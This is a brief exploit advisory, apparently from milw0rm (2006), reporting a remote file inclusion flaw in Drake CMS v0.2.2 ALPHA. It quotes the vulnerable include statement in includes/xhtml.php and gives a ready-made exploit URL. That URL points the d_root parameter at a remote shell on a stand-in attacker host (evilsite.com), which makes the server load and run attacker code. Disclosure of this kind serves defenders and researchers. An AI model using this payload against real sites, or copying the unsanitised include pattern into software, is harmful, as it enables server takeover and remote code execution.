********************************************************************************************************** Coding 4 Fun (c4f.pl) ********************************************************************************************************** * Drake CMS v0.2.2 ALPHA rev.846 (http://drakecms.org) ; * Class = Remote File Inclusion ; * Download = https://sourceforge.net/project/showfiles.php?group_id=166901&package_id=192077&release_id=420102 ; * Found by = GregStar (gregstar[at]c4f[dot]pl) ; ------------------------------------------------------------------------------------------------------------------- - Vulnerable Code in "includes/xhtml.php" : include $d_root.'classes/kses.php'; ++++++++++++++++++++++++++++++++++++++++++++ - Exploit: http://[target]/[path]/includes/xhtml.php?d_root=http://evilsite.com/shell? ------------------------------------------------------------------------------------------------------------------ Gr33tz: sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,SlashBeast,chochlik,RFL,d3m0n,java,reyw,kw@ch and for all friends. ************************************************************************************************************** # milw0rm.com [2006-11-04]